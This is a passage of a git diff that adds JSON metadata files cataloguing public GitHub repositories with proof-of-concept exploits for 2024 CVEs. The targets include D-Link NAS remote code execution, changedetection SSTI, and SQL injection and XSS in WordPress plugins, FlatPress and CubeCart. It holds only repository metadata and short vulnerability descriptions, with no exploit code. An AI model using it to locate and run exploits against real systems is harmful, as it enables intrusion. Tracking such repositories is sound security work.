811262145, + "name": "CVE-2024-32640", + "full_name": "sammings\/CVE-2024-32640", + "owner": { + "login": "sammings", + "id": 149979829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149979829?v=4", + "html_url": "https:\/\/github.com\/sammings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sammings\/CVE-2024-32640", + "description": "sql延时注入poc", + "fork": false, + "created_at": "2024-06-06T08:56:34Z", + "updated_at": "2024-06-06T08:58:13Z", + "pushed_at": "2024-06-06T08:58:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887494835, + "name": "CVE-2024-32640", + "full_name": "pizza-power\/CVE-2024-32640", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/CVE-2024-32640", + "description": "Python POC for CVE-2024-32640 Mura CMS SQLi", + "fork": false, + "created_at": "2024-11-12T20:50:11Z", + "updated_at": "2024-11-16T12:30:55Z", + "pushed_at": "2024-11-15T16:30:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32651.json b/2024/CVE-2024-32651.json new file mode 100644 index 0000000000..65a4c49718 --- /dev/null +++ b/2024/CVE-2024-32651.json @@ -0,0 +1,64 @@ +[ + { + "id": 806279478, + "name": "cve-2024-32651", + "full_name": "zcrosman\/cve-2024-32651", + "owner": { + "login": "zcrosman", + "id": 21688962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21688962?v=4", + "html_url": "https:\/\/github.com\/zcrosman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcrosman\/cve-2024-32651", + "description": "changedetection rce though ssti", + "fork": false, + "created_at": "2024-05-26T21:24:14Z", + "updated_at": "2024-10-28T13:48:04Z", + "pushed_at": "2024-05-26T21:42:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858185537, + "name": "CVE-2024-32651-changedetection-RCE", + "full_name": "s0ck3t-s3c\/CVE-2024-32651-changedetection-RCE", + "owner": { + "login": "s0ck3t-s3c", + "id": 181068619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181068619?v=4", + "html_url": "https:\/\/github.com\/s0ck3t-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s0ck3t-s3c\/CVE-2024-32651-changedetection-RCE", + "description": "Server-Side Template Injection Exploit", + "fork": false, + "created_at": "2024-09-16T13:11:38Z", + "updated_at": "2024-10-28T13:56:04Z", + "pushed_at": "2024-09-18T09:16:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32700.json b/2024/CVE-2024-32700.json new file mode 100644 index 0000000000..df3ee36565 --- /dev/null +++ b/2024/CVE-2024-32700.json @@ -0,0 +1,33 @@ +[ + { + "id": 837513457, + "name": "CVE-2024-32700", + "full_name": "nastar-id\/CVE-2024-32700", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2024-32700", + "description": null, + "fork": false, + "created_at": "2024-08-03T07:41:30Z", + "updated_at": "2024-08-05T17:20:40Z", + "pushed_at": "2024-08-05T17:20:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32709.json b/2024/CVE-2024-32709.json new file mode 100644 index 0000000000..613746cbca --- /dev/null +++ b/2024/CVE-2024-32709.json @@ -0,0 +1,33 @@ +[ + { + "id": 796349926, + "name": "CVE-2024-32709-Poc", + "full_name": "truonghuuphuc\/CVE-2024-32709-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32709-Poc", + "description": "CVE-2024-32709 WP-Recall – Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-05T17:21:55Z", + "updated_at": "2024-07-04T06:16:17Z", + "pushed_at": "2024-05-06T16:17:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3272.json b/2024/CVE-2024-3272.json new file mode 100644 index 0000000000..20d2dafc23 --- /dev/null +++ b/2024/CVE-2024-3272.json @@ -0,0 +1,64 @@ +[ + { + "id": 783750436, + "name": "D-Link-NAS-Devices-Unauthenticated-RCE", + "full_name": "nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE", + "owner": { + "login": "nickswink", + "id": 57839593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57839593?v=4", + "html_url": "https:\/\/github.com\/nickswink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE", + "description": "UNTESTED exploit script for CVE-2024-3272 + CVE-2024-3273. The script exploits a backdoor authentication bypass + arbitrary command injection vulnerability. ", + "fork": false, + "created_at": "2024-04-08T13:54:07Z", + "updated_at": "2024-07-29T21:52:56Z", + "pushed_at": "2024-04-08T13:57:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803710130, + "name": "dinkleberry", + "full_name": "aliask\/dinkleberry", + "owner": { + "login": "aliask", + "id": 6219869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6219869?v=4", + "html_url": "https:\/\/github.com\/aliask", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aliask\/dinkleberry", + "description": "Patch your D-Link device affected by CVE-2024-3272 ", + "fork": false, + "created_at": "2024-05-21T08:40:37Z", + "updated_at": "2024-05-25T00:36:53Z", + "pushed_at": "2024-05-25T00:36:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3273.json b/2024/CVE-2024-3273.json new file mode 100644 index 0000000000..72a9ab9da1 --- /dev/null +++ b/2024/CVE-2024-3273.json @@ -0,0 +1,297 @@ +[ + { + "id": 783134888, + "name": "CVE-2024-3273", + "full_name": "Chocapikk\/CVE-2024-3273", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3273", + "description": "D-Link NAS CVE-2024-3273 Exploit Tool", + "fork": false, + "created_at": "2024-04-07T03:09:13Z", + "updated_at": "2024-11-28T09:21:59Z", + "pushed_at": "2024-04-07T04:41:26Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 92, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 783329699, + "name": "CVE-2024-3273", + "full_name": "adhikara13\/CVE-2024-3273", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-3273", + "description": "Exploit for CVE-2024-3273, supports single and multiple hosts", + "fork": false, + "created_at": "2024-04-07T15:36:18Z", + "updated_at": "2024-10-17T12:54:48Z", + "pushed_at": "2024-04-07T15:41:42Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 783429302, + "name": "honeypot-dlink-CVE-2024-3273", + "full_name": "yarienkiva\/honeypot-dlink-CVE-2024-3273", + "owner": { + "login": "yarienkiva", + "id": 42248482, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42248482?v=4", + "html_url": "https:\/\/github.com\/yarienkiva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yarienkiva\/honeypot-dlink-CVE-2024-3273", + "description": "Quick and dirty honeypot for CVE-2024-3273", + "fork": false, + "created_at": "2024-04-07T21:15:33Z", + "updated_at": "2024-04-07T21:40:55Z", + "pushed_at": "2024-04-16T00:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784219188, + "name": "CVE-2024-3273-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-3273-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-3273-EXPLOIT", + "description": "A PoC exploit for CVE-2024-3273 - D-Link Remote Code Execution RCE", + "fork": false, + "created_at": "2024-04-09T12:26:37Z", + "updated_at": "2024-10-17T13:18:40Z", + "pushed_at": "2024-04-09T12:51:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "command-injections", + "cve-2024-3273", + "d-link", + "devices", + "exploit", + "exploitation", + "exploits", + "hacking", + "poc", + "proof-of-concept", + "rce-exploit", + "remote-code-execution", + "scanner", + "systems" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784490856, + "name": "CVE-2024-3273", + "full_name": "ThatNotEasy\/CVE-2024-3273", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-3273", + "description": "D-Link NAS Command Execution Exploit", + "fork": false, + "created_at": "2024-04-10T00:27:02Z", + "updated_at": "2024-10-17T13:28:04Z", + "pushed_at": "2024-04-10T00:36:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787302962, + "name": "CVE-2024-3273", + "full_name": "LeopoldSkell\/CVE-2024-3273", + "owner": { + "login": "LeopoldSkell", + "id": 96363396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96363396?v=4", + "html_url": "https:\/\/github.com\/LeopoldSkell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeopoldSkell\/CVE-2024-3273", + "description": null, + "fork": false, + "created_at": "2024-04-16T09:12:58Z", + "updated_at": "2024-04-16T09:12:58Z", + "pushed_at": "2024-04-16T09:12:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790582261, + "name": "CVE-2024-3273-", + "full_name": "mrrobot0o\/CVE-2024-3273-", + "owner": { + "login": "mrrobot0o", + "id": 88867340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88867340?v=4", + "html_url": "https:\/\/github.com\/mrrobot0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrrobot0o\/CVE-2024-3273-", + "description": null, + "fork": false, + "created_at": "2024-04-23T06:31:19Z", + "updated_at": "2024-04-23T06:32:42Z", + "pushed_at": "2024-04-23T06:32:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796423211, + "name": "Turvan6rkus-CVE-2024-3273", + "full_name": "OIivr\/Turvan6rkus-CVE-2024-3273", + "owner": { + "login": "OIivr", + "id": 114483187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114483187?v=4", + "html_url": "https:\/\/github.com\/OIivr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OIivr\/Turvan6rkus-CVE-2024-3273", + "description": "Turvanõrkuse CVE 2024 3273 analüüs: D-Link seadmete käsusüst", + "fork": false, + "created_at": "2024-05-05T22:07:02Z", + "updated_at": "2024-09-04T15:36:02Z", + "pushed_at": "2024-05-25T17:27:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860862729, + "name": "CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "full_name": "X-Projetion\/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "description": "CVE-2024-3273 - D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-09-21T11:17:34Z", + "updated_at": "2024-09-21T11:24:51Z", + "pushed_at": "2024-09-21T11:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3293.json b/2024/CVE-2024-3293.json new file mode 100644 index 0000000000..674106cadb --- /dev/null +++ b/2024/CVE-2024-3293.json @@ -0,0 +1,33 @@ +[ + { + "id": 807945955, + "name": "CVE-2024-3293-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3293-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3293-Poc", + "description": "CVE-2024-3293 rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Authenticated (Contributor+) SQL Injection via rtmedia_gallery Shortcode", + "fork": false, + "created_at": "2024-05-30T04:51:32Z", + "updated_at": "2024-06-26T12:03:21Z", + "pushed_at": "2024-05-30T05:00:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33111.json b/2024/CVE-2024-33111.json new file mode 100644 index 0000000000..3cddd49700 --- /dev/null +++ b/2024/CVE-2024-33111.json @@ -0,0 +1,33 @@ +[ + { + "id": 819977597, + "name": "CVE-2024-33111", + "full_name": "FaLLenSKiLL1\/CVE-2024-33111", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33111", + "description": "D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via \/htdocs\/webinc\/js\/bsc_sms_inbox.php.", + "fork": false, + "created_at": "2024-06-25T14:54:01Z", + "updated_at": "2024-06-25T14:58:30Z", + "pushed_at": "2024-06-25T14:58:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33113.json b/2024/CVE-2024-33113.json new file mode 100644 index 0000000000..8aaca11b74 --- /dev/null +++ b/2024/CVE-2024-33113.json @@ -0,0 +1,64 @@ +[ + { + "id": 819580514, + "name": "CVE-2024-33113", + "full_name": "FaLLenSKiLL1\/CVE-2024-33113", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33113", + "description": "D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.", + "fork": false, + "created_at": "2024-06-24T19:50:13Z", + "updated_at": "2024-08-29T13:31:13Z", + "pushed_at": "2024-06-24T21:27:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819959946, + "name": "CVE-2024-33113", + "full_name": "tekua\/CVE-2024-33113", + "owner": { + "login": "tekua", + "id": 38267231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38267231?v=4", + "html_url": "https:\/\/github.com\/tekua", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tekua\/CVE-2024-33113", + "description": "Le routeur D-LINK DIR-845L est vulnérable à un problème de divulgation d'informations. Plus précisément, le fichier bsc_sms_inbox.php sur l'appareil peut être exploité pour divulguer des informations sensibles.", + "fork": false, + "created_at": "2024-06-25T14:16:03Z", + "updated_at": "2024-06-25T14:44:24Z", + "pushed_at": "2024-06-25T14:42:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33209.json b/2024/CVE-2024-33209.json new file mode 100644 index 0000000000..b0230590d4 --- /dev/null +++ b/2024/CVE-2024-33209.json @@ -0,0 +1,33 @@ +[ + { + "id": 864440771, + "name": "CVE-2024-33209", + "full_name": "paragbagul111\/CVE-2024-33209", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-33209", + "description": "FlatPress 1.3. is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the \"Add New Entry\" section, which allows them to execute arbitrary code in the context of a victim's web browser.", + "fork": false, + "created_at": "2024-09-28T08:17:01Z", + "updated_at": "2024-09-28T08:21:06Z", + "pushed_at": "2024-09-28T08:21:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33210.json b/2024/CVE-2024-33210.json new file mode 100644 index 0000000000..fa47a67ab4 --- /dev/null +++ b/2024/CVE-2024-33210.json @@ -0,0 +1,33 @@ +[ + { + "id": 864442880, + "name": "CVE-2024-33210", + "full_name": "paragbagul111\/CVE-2024-33210", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-33210", + "description": "A cross-site scripting (XSS) vulnerability has been identified in Flatpress 1.3. This vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users.", + "fork": false, + "created_at": "2024-09-28T08:24:42Z", + "updated_at": "2024-09-28T08:29:18Z", + "pushed_at": "2024-09-28T08:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33231.json b/2024/CVE-2024-33231.json new file mode 100644 index 0000000000..29038e16de --- /dev/null +++ b/2024/CVE-2024-33231.json @@ -0,0 +1,37 @@ +[ + { + "id": 875006628, + "name": "CVE-2024-33231", + "full_name": "fdzdev\/CVE-2024-33231", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-33231", + "description": "XSS Vulnerability via File Upload in Ferozo Webmail Application", + "fork": false, + "created_at": "2024-10-18T22:09:27Z", + "updated_at": "2024-11-13T07:54:01Z", + "pushed_at": "2024-10-18T22:13:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-33231", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33352.json b/2024/CVE-2024-33352.json new file mode 100644 index 0000000000..93755f402d --- /dev/null +++ b/2024/CVE-2024-33352.json @@ -0,0 +1,41 @@ +[ + { + "id": 829319256, + "name": "CVE-2024-33352", + "full_name": "mmiszczyk\/CVE-2024-33352", + "owner": { + "login": "mmiszczyk", + "id": 20739931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20739931?v=4", + "html_url": "https:\/\/github.com\/mmiszczyk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmiszczyk\/CVE-2024-33352", + "description": "BlueStacks privilege escalation through VM backdooring", + "fork": false, + "created_at": "2024-07-16T07:38:19Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-16T09:12:57Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "cve", + "exploit", + "privilege-escalation", + "security", + "vm-escape" + ], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33438.json b/2024/CVE-2024-33438.json new file mode 100644 index 0000000000..3e1b4fa3ba --- /dev/null +++ b/2024/CVE-2024-33438.json @@ -0,0 +1,33 @@ +[ + { + "id": 791393298, + "name": "CVE-2024-33438", + "full_name": "julio-cfa\/CVE-2024-33438", + "owner": { + "login": "julio-cfa", + "id": 52619625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52619625?v=4", + "html_url": "https:\/\/github.com\/julio-cfa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julio-cfa\/CVE-2024-33438", + "description": "CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).", + "fork": false, + "created_at": "2024-04-24T16:31:17Z", + "updated_at": "2024-11-20T16:30:45Z", + "pushed_at": "2024-05-02T16:06:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33453.json b/2024/CVE-2024-33453.json new file mode 100644 index 0000000000..ffb6f15238 --- /dev/null +++ b/2024/CVE-2024-33453.json @@ -0,0 +1,33 @@ +[ + { + "id": 851484894, + "name": "CVE-2024-33453", + "full_name": "Ant1sec-ops\/CVE-2024-33453", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-33453", + "description": "Sensitive Data exposure ", + "fork": false, + "created_at": "2024-09-03T07:21:25Z", + "updated_at": "2024-09-04T13:08:33Z", + "pushed_at": "2024-09-04T13:08:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33559.json b/2024/CVE-2024-33559.json new file mode 100644 index 0000000000..3ac0d9fc5a --- /dev/null +++ b/2024/CVE-2024-33559.json @@ -0,0 +1,33 @@ +[ + { + "id": 801864496, + "name": "WordPress-XStore-theme-SQL-Injection", + "full_name": "absholi7ly\/WordPress-XStore-theme-SQL-Injection", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/WordPress-XStore-theme-SQL-Injection", + "description": "(CVE-2024-33559) The XStore theme for WordPress is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query", + "fork": false, + "created_at": "2024-05-17T04:15:34Z", + "updated_at": "2024-10-14T23:33:27Z", + "pushed_at": "2024-05-17T04:20:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33644.json b/2024/CVE-2024-33644.json new file mode 100644 index 0000000000..646a1b17fb --- /dev/null +++ b/2024/CVE-2024-33644.json @@ -0,0 +1,33 @@ +[ + { + "id": 845237835, + "name": "ReproducingCVEs_Akshath_Nagulapally", + "full_name": "Akshath-Nagulapally\/ReproducingCVEs_Akshath_Nagulapally", + "owner": { + "login": "Akshath-Nagulapally", + "id": 140837101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140837101?v=4", + "html_url": "https:\/\/github.com\/Akshath-Nagulapally", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akshath-Nagulapally\/ReproducingCVEs_Akshath_Nagulapally", + "description": "Reproducing the following CVEs with dockerfile:CVE-2024-33644 CVE-2024-34370 CVE-2024-22120", + "fork": false, + "created_at": "2024-08-20T21:27:49Z", + "updated_at": "2024-08-20T21:27:53Z", + "pushed_at": 